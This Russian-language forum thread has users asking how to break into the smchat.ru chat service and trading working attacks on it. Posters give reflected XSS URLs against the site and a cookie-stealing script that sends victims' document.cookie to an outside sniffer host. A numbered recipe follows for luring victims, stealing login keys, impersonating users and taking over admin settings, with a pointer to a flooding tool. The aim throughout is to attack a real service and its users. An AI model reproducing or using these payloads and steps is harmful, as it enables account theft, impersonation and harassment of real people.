Помогите со взломом smchat-а

Помогите плз ломануть www.smchat.ru.у меня несколько вопросов,ответьте на какие сможете:Как его ломануть или чаты на нём?Как утащить админство или узнать пароли админа?Как узнать айпи если ты не модер?Какие проги есть для его взлома или флуда?

 

Я знаю как узнать Ip, если ты не модер, причём Ip любого юзера в чате и не только в твоем, а в любом (в этой системе).. но это думаю потом.. =) Полчше изучу движочек ихней на досуге)

 

Изучи плз и скажи как и что...Как айпи узнать?

 

Да подскажите что нибудь по этой теме...
А именно как дёрнуть чужие куки?

 

Узнавать ip довольно легко =) создаешь свой чат и в нем пишешь /ip [имя пользователя]

 

Там на главной странице при отсутствии пользователя в базе данных, выводится, что пользователя с ником ***(че ввели) можно зарегать... На форме стоит ограничение кол-ва вводимых символов...но оно производится путем html то есть если исправить, что все будет тип-топ... времени нет..Кто-нибудь проверьте это на пассифную XSS

 

Мне один писал что можно зайти под чужим ником через фрейм сообщений, а как?

 

Вот прочитав всё это ко мне в голову идия пришла =) Система такова. Создаешь сайтик на нем создаешь ip.php заинклудь в индекс и попроси того узера Вглянуть на сайт и посмотреть он работает или нет... При заход на сайт у тебя его ИП в кармане, но в этом всём есть не доработка что он может с прокси зайти! Но попробовать можно!

 

Всё гороздо прощё ставишь персональный сниффер и всё.....
Но не в этом суть, я спрашивал есть ли что нибудь круче чем этот метод?

 

Вот - http://smchat.ru/chat.php?chatname=Izarion"><script>alert(/ok/)</script> пассивная XSS, вот только толку от этого?

 

И еще - http://smchat.ru/index.php?s=autoriz&login=<script>var%20xss_test=333333333%3Balert(xss_test)%3B</script>&password=1 ; http://smchat.ru/chat.php?chatname=<script>var%20xss_test=222222222%3Balert(xss_test)%3B</script>&login=1&key=1 ; http://smchat.ru/index.php?s=autoriz&login=<script>var%20xss_test=333333333%3Balert(xss_test)%3B</script>&password=1

 

А я вот впендюрил в логин <script>alert() (т.е. скока влезло) и пасс любой... выскакивает ошибка в 364 строчке...

 

Еще немного посмотрел, можно посылать сообщения под гостем даже если это запрещено в чате. Заходим под гостем в какой-нибудь чат, сохраняем чат на hdd, правим пути (все как всегда) и меняем название чата на тот в котором хотим писать под гостем. Если разобраться с ключем smchat'а, наверное можно будет писать под любым ником.

 

Я заметил что при регистрации нужен ключ, так вот ключ не какой нибудь а он зависит от введённого ника

 

Все, добился своего =) Создаем свой чат и в настройка в поле Объявления пишем знакомую конструкцию: <script>img=new Image(); img.src="http://s.netsec.ru/moroz/pic.gif?;"+document.cookie;</script>. Просим жертву зайти в свой чат и вам сохраняется его логин и ключ.

 

Может и гений! Что "поинерестнее" тебе надо? Может тебе root там нужен? Что там на первой странице? Там нет cookies которые ты "дёрнуть" хочешь! Там есть логин и ключ! Которых достаточно чтобы зайти в чат или изменить его если ты дернул ключ админа!
Итого:1) Чтобы узнать ip надо создать свой чат и в нем написать /ip [имя жертвы].
2) Чтобы зафлудить его вполне можно использовать "Универсальный чатфлудер" - http://forum.antichat.ru/thread16011.html
3) Стащить "пароль" можно создав свой чат и в настройках->Объявления вставить путь к снифферу и заманить жертву на свой чат.
4) Используя логин и ключ можно зайти в чат под жертвой - http://smchat.ru/chat.php?chatname=[имя чата]&login=[логин]&key=[ключ]
5) Если вы заманили админа одного из чатов можно так же изменить настройки чата - http://smchat.ru/index.php?chatname=[имя чата]&login=[логин]&key=[ключ]
6) Все.

 

Всё гороздо прощё ставишь персональный сниффер и всё.....
Но не в этом суть, я спрашивал есть ли что нибудь круче чем этот метод?
Вот что я писал, а про то что там сессия, никто и не спорит, а про поитерестнее я имел ввиду то что там можно сделать автомотическую регистрацию, только как?

 

Ну ты даёшь..... правда я ничерта не понял про синфер

<script>img=new Image(); img.src="http://s.netsec.ru/moroz/pic.gif?;"+document.cookie;</script>. ну вот это как я понял долбучая смесь джиэс и тэга вставки изображения , ну ок, ты в этом плане смыслишь больше по этому спорить не буду, но вот КУДА ЭТО СОХРАНЯЕТСЯ ? ГДЕ МНЕ ПОТОМ ИСКАТЬ ЕГО ЛОГИН и КЛЮЧЬ ?

 

регистрируй себе сниффер и смотри логи.

 

Мужик, еслиб я ещё знал что такое "сниффер" и с чем его едят, а также хотелось бы знать где его регят и тд :d